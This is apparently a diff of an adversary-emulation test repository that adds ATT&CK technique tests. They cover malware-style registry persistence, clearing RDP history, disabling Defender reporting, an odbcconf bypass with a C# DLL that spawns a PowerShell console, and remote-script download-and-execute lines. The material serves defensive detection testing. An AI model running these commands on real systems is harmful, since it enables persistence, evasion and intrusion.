+      invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+  - description: |
+      The AzureAD module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  - description: |
+      The Az module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az -Force
+  executor:
+    command: |
+      Import-Module $env:temp\AzureStealth.ps1 -force      
+      $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+      Connect-AzAccount -Credential $Credential
+      Connect-AzureAD -Credential $Credential
+      Scan-AzureAdmins -UseCurrentCred
+    cleanup_command: |
+      $resultstime = Get-Date -Format "yyyyMMdd"
+      $resultsfolder = ("Results-" + $resultstime)
+      remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+    name: powershell
+    elevation_required: true

atomics/T1087.002/T1087.002.md

@@ -114,7 +114,7 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
+| computer_name | Name of remote system to query | String | %COMPUTERNAME%|
 
 
 #### Attack Commands: Run with `command_prompt`! 

atomics/T1087.002/T1087.002.yaml

@@ -35,7 +35,7 @@ atomic_tests:
     computer_name:
       description: Name of remote system to query
       type: String
-      default: $env:COMPUTERNAME
+      default: "%COMPUTERNAME%"
   executor:
     command: |
       query user /SERVER:#{computer_name}

atomics/T1112/T1112.md

@@ -86,6 +86,16 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #38 - Allow RDP Remote Assistance Feature](#atomic-test-38---allow-rdp-remote-assistance-feature)
 
+- [Atomic Test #39 - NetWire RAT Registry Key Creation](#atomic-test-39---netwire-rat-registry-key-creation)
+
+- [Atomic Test #40 - Ursnif Malware Registry Key Creation](#atomic-test-40---ursnif-malware-registry-key-creation)
+
+- [Atomic Test #41 - Terminal Server Client Connection History Cleared](#atomic-test-41---terminal-server-client-connection-history-cleared)
+
+- [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
+
+- [Atomic Test #43 - DisallowRun Execution Of Certain Application](#atomic-test-43---disallowrun-execution-of-certain-application)
+
 
 <br/>
 
@@ -1414,4 +1424,192 @@ reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetH
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #39 - NetWire RAT Registry Key Creation
+NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #40 - Ursnif Malware Registry Key Creation
+Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c375558d-7c25-45e9-bd64-7b23a97c1db0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #41 - Terminal Server Client Connection History Cleared
+The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3448824b-3c35-4a9e-a8f5-f887f68bea21
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Must have the "MR9" Remote Desktop Connection history Key
+##### Check Prereq Commands:
+```powershell
+if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #42 - Disable Windows Error Reporting Settings
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
+encounter in specific application or process.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2c9e41e-cd86-473d-980d-b6403562e3e1
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #43 - DisallowRun Execution Of Certain Application
+Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
+using security product.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 71db768a-5a9c-4047-b5e7-59e01f188e84
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1112/T1112.yaml

@@ -604,3 +604,94 @@ atomic_tests:
       reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: NetWire RAT Registry Key Creation
+  auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+  description: |
+    NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+    See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+      reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+      reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+    cleanup_command: |
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+      reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+      reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Ursnif Malware Registry Key Creation
+  auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+  description: |
+      Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+      More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
+    cleanup_command: |
+      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Terminal Server Client Connection History Cleared
+  auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+  description: |
+      The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Must have the "MR9" Remote Desktop Connection history Key 
+    prereq_command: |
+      if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
+      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+      New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
+      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+  executor:
+    command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Error Reporting Settings
+  auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
+    encounter in specific application or process.
+    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+      reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: DisallowRun Execution Of Certain Application
+  auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
+    using security product.
+    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

atomics/T1135/T1135.md

@@ -83,7 +83,7 @@ Network Share Discovery using smbstatus
 
 
 ```bash
-smbstatus --shares
+sudo smbstatus --shares
 ```
 
 

atomics/T1135/T1135.yaml

@@ -43,7 +43,7 @@ atomic_tests:
       sudo #{package_installer} 
   executor:
     command: |
-      smbstatus --shares
+      sudo smbstatus --shares
     name: bash
     elevation_required: true
 - name: Network Share Discovery command prompt
@@ -131,4 +131,4 @@ atomic_tests:
       $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       shareenumeration -noninteractive -consoleoutput
-    name: powershell
+    name: powershell

atomics/T1218.008/T1218.008.md

@@ -9,6 +9,8 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
 
 - [Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-1---odbcconfexe---execute-arbitrary-dll)
 
+- [Atomic Test #2 - Odbcconf.exe - Load Response File](#atomic-test-2---odbcconfexe---load-response-file)
+
 
 <br/>
 
@@ -55,4 +57,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Odbcconf.exe - Load Response File
+Execute arbitrary response file that will spawn PowerShell.exe.
+Source files: https://github.com/woanware/application-restriction-bypasses
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rsp_file_name | Response file name to load | String | T1218.008.rsp|
+| rsp_file_path | Response file path | String | PathToAtomicsFolder&#92;T1218.008&#92;bin&#92;|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+cd #{rsp_file_path}
+odbcconf.exe -f #{rsp_file_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+```
+
+
+
+
 <br/>

atomics/T1218.008/T1218.008.yaml

@@ -24,4 +24,34 @@ atomic_tests:
   executor:
     command: |
       odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
-    name: command_prompt
+    name: command_prompt
+- name: Odbcconf.exe - Load Response File
+  auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+  description: |
+    Execute arbitrary response file that will spawn PowerShell.exe.
+    Source files: https://github.com/woanware/application-restriction-bypasses
+  supported_platforms:
+  - windows
+  input_arguments:
+    rsp_file_name:
+      description: Response file name to load
+      type: String
+      default: T1218.008.rsp
+    rsp_file_path:
+      description: Response file path
+      type: String
+      default: PathToAtomicsFolder\T1218.008\bin\
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+    prereq_command: |
+      if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+  executor:
+    command: |
+      cd #{rsp_file_path}
+      odbcconf.exe -f #{rsp_file_name}
+    name: command_prompt

atomics/T1218.008/bin/T1218.008.rsp

@@ -0,0 +1 @@
+REGSVR o.dll

atomics/T1218.008/src/odbcconf net.20/Class1.cs

@@ -0,0 +1,77 @@
+// https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
+
+// odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using RGiesecke.DllExport;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+
+public class Test
+{
+
+    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+    public static bool DllRegisterServer()
+    {
+        while (true)
+        {
+            AllocConsole();
+            IntPtr defaultStdout = new IntPtr(7);
+            IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+            Console.Write("PS >");
+            string x = Console.ReadLine();
+            try
+            {
+                Console.WriteLine(RunPSCommand(x));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine(e.Message);
+            }
+        }
+        return true;
+    }
+    //Based on Jared Atkinson's And Justin Warner's Work
+    public static string RunPSCommand(string cmd)
+    {
+        //Init stuff
+        Runspace runspace = RunspaceFactory.CreateRunspace();
+        runspace.Open();
+        RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+        Pipeline pipeline = runspace.CreatePipeline();
+
+        //Add commands
+        pipeline.Commands.AddScript(cmd);
+
+        //Prep PS for string output and invoke
+        pipeline.Commands.Add("Out-String");
+        Collection<PSObject> results = pipeline.Invoke();
+        runspace.Close();
+
+        //Convert records to strings
+        StringBuilder stringBuilder = new StringBuilder();
+        foreach (PSObject obj in results)
+        {
+            stringBuilder.Append(obj);
+        }
+        return stringBuilder.ToString().Trim();
+    }
+
+    public static void RunPSFile(string script)
+    {
+        PowerShell ps = PowerShell.Create();
+        ps.AddScript(script).Invoke();
+    }
+
+    private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+    [DllImport("kernel32.dll")]
+    private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+    [DllImport("kernel32.dll")]
+    private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+    [DllImport("kernel32")]
+    static extern bool AllocConsole();
+
+}

atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbcconf")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("Microsoft")]
+[assembly: AssemblyProduct("odbcconf")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible 
+// to COM components.  If you need to access a type in this assembly from 
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("8346cf2d-dbdf-4ffd-a4dc-4d51f1d8d3b9")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version 
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers 
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj

@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}</ProjectGuid>
+    <OutputType>Library</OutputType>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <RootNamespace>odbcconf</RootNamespace>
+    <AssemblyName>oc</AssemblyName>
+    <TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <TargetFrameworkProfile />
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <PlatformTarget>x64</PlatformTarget>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="RGiesecke.DllExport.Metadata, Version=1.0.0.0, Culture=neutral, PublicKeyToken=8f52d83c1a22df51, processorArchitecture=MSIL">
+      <HintPath>packages\UnmanagedExports.1.2.7\lib\net\RGiesecke.DllExport.Metadata.dll</HintPath>
+      <SpecificVersion>False</SpecificVersion>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
+      <SpecificVersion>False</SpecificVersion>
+      <HintPath>..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
+    </Reference>
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Class1.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="packages.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Import Project="packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets" Condition="Exists('packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets')" />
+  <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
+       Other similar extension points exist, see Microsoft.Common.targets.
+  <Target Name="BeforeBuild">
+  </Target>
+  <Target Name="AfterBuild">
+  </Target>
+  -->
+</Project>

atomics/T1218.008/src/odbcconf net.20/odbcconf.sln

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

atomics/T1218.008/src/odbcconf net.20/packages.config

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="UnmanagedExports" version="1.2.7" targetFramework="net20" />
+</packages>

atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1

@@ -0,0 +1,105 @@
+function Remove-OldDllExportFolder {
+	param($project)
+	$defaultFiles = ('DllExportAttribute.cs',
+	                 'Mono.Cecil.dll',
+	                 'RGiesecke.DllExport.dll',
+	                 'RGiesecke.DllExport.pdb',
+	                 'RGiesecke.DllExport.MSBuild.dll',
+	                 'RGiesecke.DllExport.MSBuild.pdb',
+	                 'RGiesecke.DllExport.targets')
+
+	$projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+	$projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+		$dllExportDir = $_
+	
+		if($dllExportDir.GetDirectories().Count -eq 0){
+			$unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+	
+			if(-not $unknownFiles){
+				Write-Host "Removing 'DllExport' from " $project.Name
+				$project.ProjectItems | ? {	$_.Name -ieq 'DllExport' } | % {
+					$_.Remove()
+				}
+
+				Write-Host "Deleting " $dllExportDir.FullName " ..."
+				$dllExportDir.Delete($true)
+			}
+		}
+	}
+}
+
+function Remove-OldDllExportFolders {
+	Get-Project -all | % {
+		Remove-OldDllExportFolder $_
+	}
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+	$msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+	$msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+	if(!$msBuildV4) {
+		throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+	}
+
+	$projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+	return $projectCollection::GlobalProjectCollection.GetLoadedProjects($fullName)
+}
+
+function Get-AllDllExportMsBuildProjects {
+	(Get-Project -all | % {
+		Get-DllExportMsBuildProjectsByFullName $_.FullName
+	}) | ? {
+		return ($_.Xml.Imports | ? {
+			   "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
